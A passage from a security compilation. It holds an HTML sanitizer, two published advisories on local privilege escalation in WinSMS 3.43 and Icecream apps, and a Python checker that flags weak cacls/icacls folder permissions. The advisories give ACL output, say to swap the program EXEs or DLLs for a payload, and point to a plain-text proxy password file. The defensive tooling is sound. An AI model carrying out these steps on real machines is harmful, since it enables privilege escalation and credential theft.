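# Hyperlink schemes allowed to survive; "data:" (the vector in the first
# advisory) and "javascript:" are not on the list and are stripped.
SAFE_SCHEMES = {"http", "https", "mailto"}
# Tags kept when rendering; <script>, <svg>, <img>, <object> are dropped.
SAFE_TAGS = {"a", "b", "i", "p", "br", "div", "span", "ul", "li"}

def safe_href(href):
    """Return the href if its scheme is allow-listed, otherwise None."""
    cleaned = "".join(href.split())  # defeats "java\nscript:" style padding
    scheme = urlsplit(cleaned).scheme.lower()
    if not scheme:                   # relative link, nothing to check
        return cleaned
    return cleaned if scheme in SAFE_SCHEMES else None

class MailSanitizer(HTMLParser):
    """Rebuilds the fragment from the allow-list; all text is HTML-escaped,
    so a PGP key name or a URL parameter echoed through here stays inert."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip += 1               # drop the element and its content
        elif tag in SAFE_TAGS:
            kept = ""
            if tag == "a":
                ok = safe_href(dict(attrs).get("href") or "")
                if ok:
                    kept = ' href="%s" rel="noopener"' % escape(ok, quote=True)
            self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip = max(0, self.skip - 1)
        elif tag in SAFE_TAGS and tag != "br":
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

def sanitize_html(fragment):
    """Sanitize an untrusted HTML fragment (mail body, key name, parameter)."""
    parser = MailSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)
```

Feeding the proof-of-concept link from the first advisory through sanitize_html yields an anchor without an href, and script elements disappear together with their content.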
# Exploit Title: WinSMS 3.43 Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.winsms.co.za
# Software Link: https://www.winsms.co.za/products/bulk-sms-desktop-software/
# Version: Software Version 3.43, Released September 2015
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
WinSMS installs by default to "C:\Program Files (x86)\WinSMS" with very weak folder permissions granting any user full permission to the contents of the directory and its subfolders. This allows ample opportunity for code execution against any other user running the application. WinSMS is typically configured as a startup program, which makes this particularly easy to leverage.
2. Proof
C:\Program Files>cacls WinSMS
C:\Program Files\WinSMS Everyone:(OI)(CI)F
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace WinSMS.exe or any of the DLLs with your preferred payload and wait for execution.
4. Plain Text Password Disclosure:
It is worth noting that sensitive information such as the proxy server password is stored in plain text within a database file located at "C:\Program Files (x86)\WinSMS\WinSMS.mdb".
# Exploit Title: Multiple Icecream Apps Local Privilege Escalation
# Date: 13/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: icecreamapps.com
# Software Versions Affected: Icecream Ebook Reader 4.21 | Icecream Screen Recorder 4.21 | Icecream Screen Recorder 2.12
# Software Link: http://icecreamapps.com/Ebook-Reader/ | http://icecreamapps.com/Screen-Recorder/ | http://icecreamapps.com/Slideshow-Maker/
# Tested on: Windows 10 Professional x64 and Windows XP SP3 x86
1. Description:
The default installation directory for Icecream Ebook Reader is "C:\Program Files (x86)\Icecream Ebook Reader" with weak folder permissions that grant EVERYONE change/modify privileges to the contents of the directory and its subfolders. This gives an attacker the opportunity to have their own code executed as any other user running the application. The same vulnerability exists for "Icecream Screen Recorder" as well as "Icecream Slideshow Maker".
2. Proof
C:\Program Files (x86)>icacls "Icecream Ebook Reader"
Icecream Ebook Reader Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files (x86)>icacls "Icecream Screen Recorder"
Icecream Screen Recorder Everyone:(OI)(CI)(M)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
C:\Program Files\Icecream Slideshow Maker Everyone:(OI)(CI)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE
BUILTIN\Power Users:C
BUILTIN\Power Users:(OI)(CI)(IO)C
BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
TULPA-842269BBB\Administrator:F
CREATOR OWNER:(OI)(CI)(IO)F
3. Exploit:
Simply replace any of the application EXEs or any of the DLLs with your preferred payload and wait for execution.
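The WinSMS and Icecream advisories above show the same condition in two listing formats (cacls letters such as F and C, icacls abbreviations such as (M) and (GR,GE), and the "special access:" continuation lines). The checker below, an added example rather than the author's code, parses either format and reports ACEs that hand a broad principal write access; the principal list and right-token set are assumptions for the example, and the samples are constructed from the listings above.

```python
import re

# Principals that effectively mean "any local user". A write-capable ACE for
# one of them on a program directory is what both advisories above describe.
BROAD_PRINCIPALS = ("Everyone", r"BUILTIN\Users",
                    r"NT AUTHORITY\Authenticated Users", r"NT AUTHORITY\INTERACTIVE")
# Right tokens that let the holder alter or replace files: cacls letters,
# icacls abbreviations and the long names cacls prints under "special access".
WRITE_RIGHTS = {"F", "C", "W", "M", "D", "GW", "GA", "WD", "AD", "WA", "WEA",
                "DC", "WDAC", "WO", "GENERIC_WRITE", "GENERIC_ALL", "DELETE",
                "WRITE_DAC", "WRITE_OWNER", "FILE_WRITE_DATA", "FILE_APPEND_DATA"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}
_ACE = re.compile("(?P<who>" + "|".join(re.escape(p) for p in BROAD_PRINCIPALS)
                  + r"):(?P<ace>.*)$")

def find_weak_aces(listing):
    """Return [(principal, [write rights])] for every ACE in a cacls or
    icacls listing that grants a broad principal write access."""
    lines = listing.splitlines()
    weak = []
    for idx, line in enumerate(lines):
        m = _ACE.search(line)          # search: the first line carries the path
        if not m:
            continue
        tokens = [t for t in re.split(r"[(),]+", m.group("ace")) if t]
        rights = [t for t in tokens if t not in INHERIT_FLAGS]
        if rights == ["special access:"]:
            # cacls lists the explicit rights on the following lines
            rights = []
            for nxt in lines[idx + 1:]:
                if ":" in nxt or not nxt.strip():
                    break
                rights.append(nxt.strip())
        granted = sorted(set(rights) & WRITE_RIGHTS)
        if granted:
            weak.append((m.group("who"), granted))
    return weak

# Constructed samples, copied from the cacls and icacls output above.
SAMPLE_CACLS = r"""C:\Program Files\WinSMS Everyone:(OI)(CI)F
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE"""
SAMPLE_ICACLS = r"""Icecream Ebook Reader Everyone:(OI)(CI)(M)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)"""
```

Run against real output by piping `icacls "C:\Program Files (x86)\<app>"` into find_weak_aces; an empty result for a program directory is the expected healthy state, while Everyone with F or M is the finding both advisories report.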